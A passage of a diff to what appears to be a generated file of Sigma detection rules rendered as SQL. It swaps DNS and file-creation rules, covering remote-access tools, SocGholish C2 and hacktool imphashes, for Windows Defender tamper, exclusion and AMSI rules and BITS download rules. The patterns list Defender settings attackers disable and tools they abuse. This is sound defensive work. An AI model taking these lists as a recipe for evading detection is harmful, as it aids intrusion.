'%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_threat.yml" }, { - "title": "DNS Query To Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE 
'%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't 
named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' 
AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + ], + "filename": "win_defender_exploit_guard_tamper.yml" + }, + { + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. 
domain controllers dc01.company.co.uk)" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. 
It attempts to load/install a package from the referenced URL", - "author": "frack113", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "description": 
"Detects new BITS transfer job saving local files with potential suspicious extensions", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', 
'9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', 
'14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE 